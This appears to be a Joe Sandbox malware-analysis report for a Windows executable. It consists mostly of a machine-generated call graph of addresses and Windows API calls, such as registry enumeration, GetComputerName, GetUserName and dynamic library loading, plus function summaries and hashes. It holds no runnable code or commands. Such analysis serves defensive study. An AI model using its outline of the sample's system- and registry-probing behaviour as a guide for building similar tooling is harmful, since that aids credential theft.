40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33352 4080d4 free 33253->33352 33256 40d0a0 CoInitialize 33254->33256 33332 40ce70 33254->33332 33255->33245 33349 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33349 33260 40d1cd 33353 407948 free free 33260->33353 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33350 40c256 PostMessageA 33262->33350 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404ae8 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33284 404b13 33281->33284 33285 404afc MessageBoxA 33281->33285 33282->33283 33283->33281 33284->33230 33285->33230 33287 410d17 LoadLibraryA 33286->33287 33288 410d3c 33286->33288 33287->33288 33289 410d2b GetProcAddress 33287->33289 33288->33232 33289->33288 33291 40cd08 ??2@YAPAXI 33290->33291 33293 40cd26 33291->33293 33294 40cd2d 33291->33294 33361 404025 6 API calls 33293->33361 33296 40cd66 33294->33296 33297 40cd59 DeleteObject 33294->33297 33354 407088 33296->33354 33297->33296 33299 40cd6b 33357 4019b5 33299->33357 33302 4019b5 strncat 33303 40cdbf _mbscpy 33302->33303 33303->33234 33363 407948 free free 33304->33363 33306 407cf7 33309 407a1f malloc memcpy free free 33306->33309 33310 407ddc 33306->33310 33312 407d7a free 33306->33312 33317 407e04 33306->33317 33367 40796e 7 API calls 33306->33367 33368 406f30 33306->33368 33309->33306 33310->33317 33376 407a1f 33310->33376 33312->33306 33364 407a55 33317->33364 33318 407e30 33319 407e57 33318->33319 33320 407e38 33318->33320 33319->33239 33319->33240 33320->33319 33321 407e41 _strcmpi 33320->33321 33321->33319 33321->33320 33382 4097ff 33322->33382 33324 409854 33387 409731 33324->33387 33328 4097ff 3 API calls 33327->33328 33329 409723 33328->33329 33407 40966c 33329->33407 33421 4023b2 33332->33421 33337 40ced3 33510 40cdda 7 API calls 33337->33510 33338 40cece 33342 40cf3f 33338->33342 33462 40c3d0 memset GetModuleFileNameA strrchr 33338->33462 33342->33264 33342->33265 33345 40ceed 33489 40affa 33345->33489 33349->33262 33350->33271 33351->33253 33352->33260 33353->33267 33362 406fc7 memset _mbscpy 33354->33362 33356 40709f CreateFontIndirectA 33356->33299 33358 4019e1 33357->33358 33359 4019c2 strncat 33358->33359 33360 4019e5 memset LoadIconA 33358->33360 33359->33358 33360->33302 33361->33294 33362->33356 33363->33306 33365 407a65 33364->33365 33366 407a5b free 33364->33366 33365->33318 33366->33365 33367->33306 33369 406f37 malloc 33368->33369 33370 406f7d 33368->33370 33372 406f73 33369->33372 33373 406f58 33369->33373 33370->33306 33372->33306 33374 406f6c free 33373->33374 33375 406f5c memcpy 33373->33375 33374->33372 33375->33374 33377 407a38 33376->33377 33378 407a2d free 33376->33378 33380 406f30 3 API calls 33377->33380 33379 407a43 33378->33379 33381 40796e 7 API calls 33379->33381 33380->33379 33381->33317 33398 406f96 GetModuleFileNameA 33382->33398 33384 409805 strrchr 33385 409814 33384->33385 33386 409817 _mbscat 33384->33386 33385->33386 33386->33324 33399 44b090 33387->33399 33392 40930c 3 API calls 33393 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33392->33393 33394 4097c5 LoadStringA 33393->33394 33395 4097db 33394->33395 33395->33394 33397 4097f3 33395->33397 33406 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33395->33406 33397->33245 33398->33384 33400 40973e _mbscpy _mbscpy 33399->33400 33401 40930c 33400->33401 33402 44b090 33401->33402 33403 409319 memset GetPrivateProfileStringA 33402->33403 33404 409374 33403->33404 33405 409364 WritePrivateProfileStringA 33403->33405 33404->33392 33405->33404 33406->33395 33417 406f81 GetFileAttributesA 33407->33417 33409 409675 33410 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33409->33410 33416 4096ee 33409->33416 33418 409278 GetPrivateProfileStringA 33410->33418 33412 4096c9 33419 409278 GetPrivateProfileStringA 33412->33419 33414 4096da 33420 409278 GetPrivateProfileStringA 33414->33420 33416->33246 33417->33409 33418->33412 33419->33414 33420->33416 33512 409c1c 33421->33512 33424 401e69 memset 33551 410dbb 33424->33551 33427 401ec2 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33427->33581 33428 401ed4 33566 406f81 GetFileAttributesA 33428->33566 33431 401ee6 strlen strlen 33433 401f15 33431->33433 33434 401f28 33431->33434 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33433->33582 33567 406f81 GetFileAttributesA 33434->33567 33437 401f35 33568 401c31 33437->33568 33440 401f75 33580 410a9c RegOpenKeyExA 33440->33580 33441 401c31 7 API calls 33441->33440 33443 401f91 33444 402187 33443->33444 33445 401f9c memset 33443->33445 33447 402195 ExpandEnvironmentStringsA 33444->33447 33448 4021a8 _strcmpi 33444->33448 33583 410b62 RegEnumKeyExA 33445->33583 33592 406f81 GetFileAttributesA 33447->33592 33448->33337 33448->33338 33450 40217e RegCloseKey 33450->33444 33451 401fd9 atoi 33452 401fef memset memset sprintf 33451->33452 33460 401fc9 33451->33460 33584 410b1e 33452->33584 33455 402165 33455->33450 33456 402076 memset memset strlen strlen 33456->33460 33457 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33460 33458 4020dd strlen strlen 33458->33460 33459 406f81 GetFileAttributesA 33459->33460 33460->33450 33460->33451 33460->33455 33460->33456 33460->33457 33460->33458 33460->33459 33461 402167 _mbscpy 33460->33461 33591 410b62 RegEnumKeyExA 33460->33591 33461->33450 33463 40c422 33462->33463 33464 40c425 _mbscat _mbscpy _mbscpy 33462->33464 33463->33464 33465 40c49d 33464->33465 33466 40c512 33465->33466 33467 40c502 GetWindowPlacement 33465->33467 33468 40c538 33466->33468 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33466->33613 33467->33466 33606 409b31 33468->33606 33472 40ba28 33473 40ba87 33472->33473 33479 40ba3c 33472->33479 33616 406c62 LoadCursorA SetCursor 33473->33616 33475 40ba8c 33617 410a9c RegOpenKeyExA 33475->33617 33618 404785 33475->33618 33621 403c16 33475->33621 33697 4107f1 33475->33697 33700 404734 33475->33700 33476 40ba43 _mbsicmp 33476->33479 33477 40baa0 33478 407e30 _strcmpi 33477->33478 33482 40bab0 33478->33482 33479->33473 33479->33476 33708 40b5e5 10 API calls 33479->33708 33480 40bafa SetCursor 33480->33345 33482->33480 33483 40baf1 qsort 33482->33483 33483->33480 34066 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33489->34066 33491 40b00e 33492 40b016 33491->33492 33493 40b01f GetStdHandle 33491->33493 34067 406d1a CreateFileA 33492->34067 33495 40b01c 33493->33495 33496 40b035 33495->33496 33497 40b12d 33495->33497 34068 406c62 LoadCursorA SetCursor 33496->34068 34072 406d77 9 API calls 33497->34072 33500 40b136 33511 40c580 28 API calls 33500->33511 33501 40b087 33508 40b0a1 33501->33508 34070 40a699 12 API calls 33501->34070 33502 40b042 33502->33501 33502->33508 34069 40a57c strlen WriteFile 33502->34069 33505 40b0d6 33506 40b116 CloseHandle 33505->33506 33507 40b11f SetCursor 33505->33507 33506->33507 33507->33500 33508->33505 34071 406d77 9 API calls 33508->34071 33510->33338 33511->33342 33524 409a32 33512->33524 33515 409c80 memcpy memcpy 33516 409cda 33515->33516 33516->33515 33517 409d18 ??2@YAPAXI ??2@YAPAXI 33516->33517 33518 408db6 12 API calls 33516->33518 33520 409d54 ??2@YAPAXI 33517->33520 33521 409d8b 33517->33521 33518->33516 33520->33521 33521->33521 33534 409b9c 33521->33534 33523 4023c1 33523->33424 33525 409a44 33524->33525 33526 409a3d ??3@YAXPAX 33524->33526 33527 409a52 33525->33527 33528 409a4b ??3@YAXPAX 33525->33528 33526->33525 33529 409a63 33527->33529 33530 409a5c ??3@YAXPAX 33527->33530 33528->33527 33531 409a83 ??2@YAPAXI ??2@YAPAXI 33529->33531 33532 409a73 ??3@YAXPAX 33529->33532 33533 409a7c ??3@YAXPAX 33529->33533 33530->33529 33531->33515 33532->33533 33533->33531 33535 407a55 free 33534->33535 33536 409ba5 33535->33536 33537 407a55 free 33536->33537 33538 409bad 33537->33538 33539 407a55 free 33538->33539 33540 409bb5 33539->33540 33541 407a55 free 33540->33541 33542 409bbd 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bd0 33543->33544 33545 407a1f 4 API calls 33544->33545 33546 409bda 33545->33546 33547 407a1f 4 API calls 33546->33547 33548 409be4 33547->33548 33549 407a1f 4 API calls 33548->33549 33550 409bee 33549->33550 33550->33523 33552 410d0e 2 API calls 33551->33552 33553 410dca 33552->33553 33554 410dfd memset 33553->33554 33593 4070ae 33553->33593 33556 410e1d 33554->33556 33596 410a9c RegOpenKeyExA 33556->33596 33559 401e9e strlen strlen 33559->33427 33559->33428 33560 410e4a 33561 410e7f _mbscpy 33560->33561 33597 410d3d _mbscpy 33560->33597 33561->33559 33563 410e5b 33598 410add RegQueryValueExA 33563->33598 33565 410e73 RegCloseKey 33565->33561 33566->33431 33567->33437 33599 410a9c RegOpenKeyExA 33568->33599 33570 401c4c 33571 401cad 33570->33571 33600 410add RegQueryValueExA 33570->33600 33571->33440 33571->33441 33573 401c6a 33574 401c71 strchr 33573->33574 33575 401ca4 RegCloseKey 33573->33575 33574->33575 33576 401c85 strchr 33574->33576 33575->33571 33576->33575 33577 401c94 33576->33577 33601 406f06 strlen 33577->33601 33579 401ca1 33579->33575 33580->33443 33581->33428 33582->33434 33583->33460 33604 410a9c RegOpenKeyExA 33584->33604 33586 410b34 33587 410b5d 33586->33587 33605 410add RegQueryValueExA 33586->33605 33587->33460 33589 410b4c RegCloseKey 33589->33587 33591->33460 33592->33448 33594 4070bd GetVersionExA 33593->33594 33595 4070ce 33593->33595 33594->33595 33595->33554 33595->33559 33596->33560 33597->33563 33598->33565 33599->33570 33600->33573 33602 406f17 33601->33602 33603 406f1a memcpy 33601->33603 33602->33603 33603->33579 33604->33586 33605->33589 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33472 33615 409868 SendMessageA 33611->33615 33613->33468 33614->33609 33615->33610 33616->33475 33617->33477 33619 4047a3 33618->33619 33620 404799 FreeLibrary 33618->33620 33619->33477 33620->33619 33622 4107f1 FreeLibrary 33621->33622 33623 403c30 LoadLibraryA 33622->33623 33624 403c74 33623->33624 33625 403c44 GetProcAddress 33623->33625 33627 4107f1 FreeLibrary 33624->33627 33625->33624 33626 403c5e 33625->33626 33626->33624 33630 403c6b 33626->33630 33628 403c7b 33627->33628 33629 404734 3 API calls 33628->33629 33631 403c86 33629->33631 33630->33628 33709 4036e5 33631->33709 33634 4036e5 27 API calls 33635 403c9a 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403ca4 33636->33637 33638 4036e5 27 API calls 33637->33638 33639 403cae 33638->33639 33721 4085d2 33639->33721 33647 403ce5 33648 403cf7 33647->33648 33902 402bd1 40 API calls 33647->33902 33767 410a9c RegOpenKeyExA 33648->33767 33651 403d0a 33652 403d1c 33651->33652 33903 402bd1 40 API calls 33651->33903 33768 402c5d 33652->33768 33656 4070ae GetVersionExA 33657 403d31 33656->33657 33786 410a9c RegOpenKeyExA 33657->33786 33659 403d51 33660 403d61 33659->33660 33904 402b22 47 API calls 33659->33904 33787 410a9c RegOpenKeyExA 33660->33787 33663 403d87 33664 403d97 33663->33664 33905 402b22 47 API calls 33663->33905 33788 410a9c RegOpenKeyExA 33664->33788 33667 403dbd 33668 403dcd 33667->33668 33906 402b22 47 API calls 33667->33906 33789 410808 33668->33789 33672 404785 FreeLibrary 33673 403de8 33672->33673 33793 402fdb 33673->33793 33676 402fdb 34 API calls 33677 403e00 33676->33677 33809 4032b7 33677->33809 33686 403e3b 33688 403e73 33686->33688 33689 403e46 _mbscpy 33686->33689 33856 40fb00 33688->33856 33908 40f334 334 API calls 33689->33908 33698 410807 33697->33698 33699 4107fc FreeLibrary 33697->33699 33698->33477 33699->33698 33701 404785 FreeLibrary 33700->33701 33702 40473b LoadLibraryA 33701->33702 33703 40474c GetProcAddress 33702->33703 33704 40476e 33702->33704 33703->33704 33705 404764 33703->33705 33706 404781 33704->33706 33707 404785 FreeLibrary 33704->33707 33705->33704 33706->33477 33707->33706 33708->33479 33710 4036fb 33709->33710 33713 4037c5 33709->33713 33909 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33710->33909 33712 40370e 33712->33713 33714 403716 strchr 33712->33714 33713->33634 33714->33713 33715 403730 33714->33715 33910 4021b6 memset 33715->33910 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33911 4023e5 16 API calls 33718->33911 33719->33718 33722 4085e2 33721->33722 33912 4082cd 11 API calls 33722->33912 33726 408600 33727 403cba 33726->33727 33728 40860b memset 33726->33728 33739 40821d 33727->33739 33915 410b62 RegEnumKeyExA 33728->33915 33730 408637 33731 4086d2 RegCloseKey 33730->33731 33733 40865c memset 33730->33733 33916 410a9c RegOpenKeyExA 33730->33916 33919 410b62 RegEnumKeyExA 33730->33919 33731->33727 33917 410add RegQueryValueExA 33733->33917 33736 408694 33918 40848b 10 API calls 33736->33918 33738 4086ab RegCloseKey 33738->33730 33920 410a9c RegOpenKeyExA 33739->33920 33741 40823f 33742 403cc6 33741->33742 33743 408246 memset 33741->33743 33751 4086e0 33742->33751 33921 410b62 RegEnumKeyExA 33743->33921 33745 4082bf RegCloseKey 33745->33742 33747 40826f 33747->33745 33922 410a9c RegOpenKeyExA 33747->33922 33923 4080ed 11 API calls 33747->33923 33924 410b62 RegEnumKeyExA 33747->33924 33750 4082a2 RegCloseKey 33750->33747 33925 4045db 33751->33925 33756 408737 wcslen 33757 4088ef 33756->33757 33763 40876a 33756->33763 33933 404656 33757->33933 33758 40877a wcsncmp 33758->33763 33760 404734 3 API calls 33760->33763 33761 404785 FreeLibrary 33761->33763 33762 408812 memset 33762->33763 33764 40883c memcpy wcschr 33762->33764 33763->33757 33763->33758 33763->33760 33763->33761 33763->33762 33763->33764 33765 4088c3 LocalFree 33763->33765 33936 40466b _mbscpy 33763->33936 33764->33763 33765->33763 33766 410a9c RegOpenKeyExA 33766->33647 33767->33651 33937 410a9c RegOpenKeyExA 33768->33937 33770 402c7a 33771 402da5 33770->33771 33772 402c87 memset 33770->33772 33771->33656 33938 410b62 RegEnumKeyExA 33772->33938 33774 402d9c RegCloseKey 33774->33771 33775 410b1e 3 API calls 33776 402ce4 memset sprintf 33775->33776 33939 410a9c RegOpenKeyExA 33776->33939 33778 402d28 33779 402d3a sprintf 33778->33779 33940 402bd1 40 API calls 33778->33940 33941 410a9c RegOpenKeyExA 33779->33941 33782 402cb2 33782->33774 33782->33775 33785 402d9a 33782->33785 33942 402bd1 40 API calls 33782->33942 33943 410b62 RegEnumKeyExA 33782->33943 33785->33774 33786->33659 33787->33663 33788->33667 33790 410816 33789->33790 33791 4107f1 FreeLibrary 33790->33791 33792 403ddd 33791->33792 33792->33672 33944 410a9c RegOpenKeyExA 33793->33944 33795 402ff9 33796 403006 memset 33795->33796 33797 40312c 33795->33797 33945 410b62 RegEnumKeyExA 33796->33945 33797->33676 33799 403122 RegCloseKey 33799->33797 33800 410b1e 3 API calls 33801 403058 memset sprintf 33800->33801 33946 410a9c RegOpenKeyExA 33801->33946 33803 403033 33803->33799 33803->33800 33804 4030a2 memset 33803->33804 33805 410b62 RegEnumKeyExA 33803->33805 33807 4030f9 RegCloseKey 33803->33807 33948 402db3 26 API calls 33803->33948 33947 410b62 RegEnumKeyExA 33804->33947 33805->33803 33807->33803 33810 4032d5 33809->33810 33811 4033a9 33809->33811 33949 4021b6 memset 33810->33949 33824 4034e4 memset memset 33811->33824 33813 4032e1 33950 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33813->33950 33815 4032ea 33816 4032f8 memset GetPrivateProfileSectionA 33815->33816 33951 4023e5 16 API calls 33815->33951 33816->33811 33821 40332f 33816->33821 33818 40339b strlen 33818->33811 33818->33821 33820 403350 strchr 33820->33821 33821->33811 33821->33818 33952 4021b6 memset 33821->33952 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33821->33953 33954 4023e5 16 API calls 33821->33954 33825 410b1e 3 API calls 33824->33825 33826 40353f 33825->33826 33827 40357f 33826->33827 33828 403546 _mbscpy 33826->33828 33832 403985 33827->33832 33955 406d55 strlen _mbscat 33828->33955 33830 403565 _mbscat 33956 4033f0 19 API calls 33830->33956 33957 40466b _mbscpy 33832->33957 33836 4039aa 33837 4039ff 33836->33837 33958 40f460 memset memset 33836->33958 33979 40f6e2 33836->33979 33995 4038e8 21 API calls 33836->33995 33839 404785 FreeLibrary 33837->33839 33840 403a0b 33839->33840 33841 4037ca memset memset 33840->33841 34003 444551 memset 33841->34003 33844 4038e2 33844->33686 33907 40f334 334 API calls 33844->33907 33846 40382e 33847 406f06 2 API calls 33846->33847 33848 403843 33847->33848 33849 406f06 2 API calls 33848->33849 33850 403855 strchr 33849->33850 33851 403884 _mbscpy 33850->33851 33852 403897 strlen 33850->33852 33853 4038bf _mbscpy 33851->33853 33852->33853 33854 4038a4 sprintf 33852->33854 34015 4023e5 16 API calls 33853->34015 33854->33853 33857 44b090 33856->33857 33858 40fb10 RegOpenKeyExA 33857->33858 33859 403e7f 33858->33859 33860 40fb3b RegOpenKeyExA 33858->33860 33870 40f96c 33859->33870 33861 40fb55 RegQueryValueExA 33860->33861 33862 40fc2d RegCloseKey 33860->33862 33863 40fc23 RegCloseKey 33861->33863 33864 40fb84 33861->33864 33862->33859 33863->33862 33865 404734 3 API calls 33864->33865 33866 40fb91 33865->33866 33866->33863 33867 40fc19 LocalFree 33866->33867 33868 40fbdd memcpy memcpy 33866->33868 33867->33863 34020 40f802 11 API calls 33868->34020 33871 4070ae GetVersionExA 33870->33871 33872 40f98d 33871->33872 33873 4045db 7 API calls 33872->33873 33881 40f9a9 33873->33881 33874 40fae6 33875 404656 FreeLibrary 33874->33875 33876 403e85 33875->33876 33882 4442ea memset 33876->33882 33877 40fa13 memset WideCharToMultiByte 33878 40fa43 _strnicmp 33877->33878 33877->33881 33879 40fa5b WideCharToMultiByte 33878->33879 33878->33881 33880 40fa88 WideCharToMultiByte 33879->33880 33879->33881 33880->33881 33881->33874 33881->33877 33883 410dbb 9 API calls 33882->33883 33884 444329 33883->33884 34021 40759e strlen strlen 33884->34021 33889 410dbb 9 API calls 33890 444350 33889->33890 33891 40759e 3 API calls 33890->33891 33892 44435a 33891->33892 33893 444212 65 API calls 33892->33893 33894 444366 memset memset 33893->33894 33895 410b1e 3 API calls 33894->33895 33896 4443b9 ExpandEnvironmentStringsA strlen 33895->33896 33897 4443f4 _strcmpi 33896->33897 33898 4443e5 33896->33898 33899 403e91 33897->33899 33900 44440c 33897->33900 33898->33897 33899->33477 33901 444212 65 API calls 33900->33901 33901->33899 33902->33648 33903->33652 33904->33660 33905->33664 33906->33668 33907->33686 33908->33688 33909->33712 33910->33717 33911->33713 33913 40841c 33912->33913 33914 410a9c RegOpenKeyExA 33913->33914 33914->33726 33915->33730 33916->33730 33917->33736 33918->33738 33919->33730 33920->33741 33921->33747 33922->33747 33923->33750 33924->33747 33926 404656 FreeLibrary 33925->33926 33927 4045e3 LoadLibraryA 33926->33927 33928 404651 33927->33928 33929 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33927->33929 33928->33756 33928->33757 33930 40463d 33929->33930 33931 404643 33930->33931 33932 404656 FreeLibrary 33930->33932 33931->33928 33932->33928 33934 403cd2 33933->33934 33935 40465c FreeLibrary 33933->33935 33934->33766 33935->33934 33936->33763 33937->33770 33938->33782 33939->33778 33940->33779 33941->33782 33942->33782 33943->33782 33944->33795 33945->33803 33946->33803 33947->33803 33948->33803 33949->33813 33950->33815 33951->33816 33952->33820 33953->33821 33954->33821 33955->33830 33956->33827 33957->33836 33996 4078ba 33958->33996 33961 4078ba _mbsnbcat 33962 40f5a3 RegOpenKeyExA 33961->33962 33963 40f5c3 RegQueryValueExA 33962->33963 33964 40f6d9 33962->33964 33965 40f6d0 RegCloseKey 33963->33965 33966 40f5f0 33963->33966 33964->33836 33965->33964 33966->33965 33967 40f675 33966->33967 34000 40466b _mbscpy 33966->34000 33967->33965 34001 4012ee strlen 33967->34001 33969 40f611 33971 404734 3 API calls 33969->33971 33976 40f616 33971->33976 33972 40f69e RegQueryValueExA 33972->33965 33973 40f6c1 33972->33973 33973->33965 33974 40f66a 33975 404785 FreeLibrary 33974->33975 33975->33967 33976->33974 33977 40f661 LocalFree 33976->33977 33978 40f645 memcpy 33976->33978 33977->33974 33978->33977 34002 40466b _mbscpy 33979->34002 33981 40f6fa 33982 4045db 7 API calls 33981->33982 33983 40f708 33982->33983 33984 40f7e2 33983->33984 33985 404734 3 API calls 33983->33985 33986 404656 FreeLibrary 33984->33986 33990 40f715 33985->33990 33987 40f7f1 33986->33987 33988 404785 FreeLibrary 33987->33988 33989 40f7fc 33988->33989 33989->33836 33990->33984 33991 40f797 WideCharToMultiByte 33990->33991 33992 40f7b8 strlen 33991->33992 33993 40f7d9 LocalFree 33991->33993 33992->33993 33994 40f7c8 _mbscpy 33992->33994 33993->33984 33994->33993 33995->33836 33997 4078e6 33996->33997 33998 4078c7 _mbsnbcat 33997->33998 33999 4078ea 33997->33999 33998->33997 33999->33961 34000->33969 34001->33972 34002->33981 34016 410a9c RegOpenKeyExA 34003->34016 34005 44458b 34006 40381a 34005->34006 34017 410add RegQueryValueExA 34005->34017 34006->33844 34014 4021b6 memset 34006->34014 34008 4445dc RegCloseKey 34008->34006 34009 4445a4 34009->34008 34018 410add RegQueryValueExA 34009->34018 34011 4445c1 34011->34008 34019 444879 30 API calls 34011->34019 34013 4445da 34013->34008 34014->33846 34015->33844 34016->34005 34017->34009 34018->34011 34019->34013 34020->33867 34022 4075c9 34021->34022 34023 4075bb _mbscat 34021->34023 34024 444212 34022->34024 34023->34022 34041 407e9d 34024->34041 34027 44424d 34028 444274 34027->34028 34029 444258 34027->34029 34049 407ef8 34027->34049 34030 407e9d 9 API calls 34028->34030 34062 444196 52 API calls 34029->34062 34037 4442a0 34030->34037 34032 407ef8 9 API calls 34032->34037 34033 4442ce 34059 407f90 34033->34059 34037->34032 34037->34033 34039 444212 65 API calls 34037->34039 34063 407e62 strcmp strcmp 34037->34063 34038 407f90 FindClose 34040 4442e4 34038->34040 34039->34037 34040->33889 34042 407f90 FindClose 34041->34042 34043 407eaa 34042->34043 34044 406f06 2 API calls 34043->34044 34045 407ebd strlen strlen 34044->34045 34046 407ee1 34045->34046 34047 407eea 34045->34047 34064 4070e3 strlen _mbscat _mbscpy _mbscat 34046->34064 34047->34027 34050 407f03 FindFirstFileA 34049->34050 34051 407f24 FindNextFileA 34049->34051 34052 407f3f 34050->34052 34053 407f46 strlen strlen 34051->34053 34054 407f3a 34051->34054 34052->34053 34056 407f7f 34052->34056 34053->34056 34057 407f76 34053->34057 34055 407f90 FindClose 34054->34055 34055->34052 34056->34027 34065 4070e3 strlen _mbscat _mbscpy _mbscat 34057->34065 34060 407fa3 34059->34060 34061 407f99 FindClose 34059->34061 34060->34038 34061->34060 34062->34027 34063->34037 34064->34047 34065->34056 34066->33491 34067->33495 34068->33502 34069->33501 34070->33508 34071->33505 34072->33500 34417 43ffc8 18 API calls 34231 4281cc 15 API calls __fprintf_l 34419 4383cc 110 API calls __fprintf_l 34232 4275d3 41 API calls 34420 4153d3 22 API calls __fprintf_l 34233 444dd7 _XcptFilter 34425 4013de 15 API calls 34427 425115 111 API calls __fprintf_l 34428 43f7db 18 API calls 34431 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34235 4335ee 16 API calls __fprintf_l 34433 429fef 11 API calls 34236 444deb _exit _c_exit 34434 40bbf0 138 API calls 34239 425115 79 API calls __fprintf_l 34438 437ffa 22 API calls 34243 4021ff 14 API calls 34244 43f5fc 149 API calls 34439 40e381 9 API calls 34246 405983 40 API calls 34247 42b186 27 API calls __fprintf_l 34248 427d86 76 API calls 34249 403585 20 API calls 34251 42e58e 18 API calls __fprintf_l 34254 425115 75 API calls __fprintf_l 34256 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34443 434395 16 API calls 34258 441d9c memcmp 34445 43f79b 119 API calls 34259 40c599 43 API calls 34446 426741 87 API calls 34263 4401a6 21 API calls 34265 426da6 memcpy memset memset memcpy 34266 4335a5 15 API calls 34268 4299ab memset memset memcpy memset memset 34269 40b1ab 8 API calls 34451 425115 76 API calls __fprintf_l 34455 4113b2 18 API calls 2 library calls 34459 40a3b8 memset sprintf SendMessageA 34073 410bbc 34076 4109cf 34073->34076 34077 4109dc 34076->34077 34078 410a23 memset GetPrivateProfileStringA 34077->34078 34079 4109ea memset 34077->34079 34084 407646 strlen 34078->34084 34089 4075cd sprintf memcpy 34079->34089 34082 410a0c WritePrivateProfileStringA 34083 410a65 34082->34083 34085 40765a 34084->34085 34086 40765c 34084->34086 34085->34083 34088 4076a3 34086->34088 34090 40737c strtoul 34086->34090 34088->34083 34089->34082 34090->34086 34271 40b5bf memset memset _mbsicmp

                                                                    Executed Functions

                                                                    Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040832F
                                                                    • memset.MSVCRT ref: 00408343
                                                                    • memset.MSVCRT ref: 0040835F
                                                                    • memset.MSVCRT ref: 00408376
                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                    • strlen.MSVCRT ref: 004083E9
                                                                    • strlen.MSVCRT ref: 004083F8
                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                    • String ID: 5$H$O$b$i$}$}
                                                                    • API String ID: 1832431107-3760989150
                                                                    • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                    • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                    Function 0044B49F Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 118COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
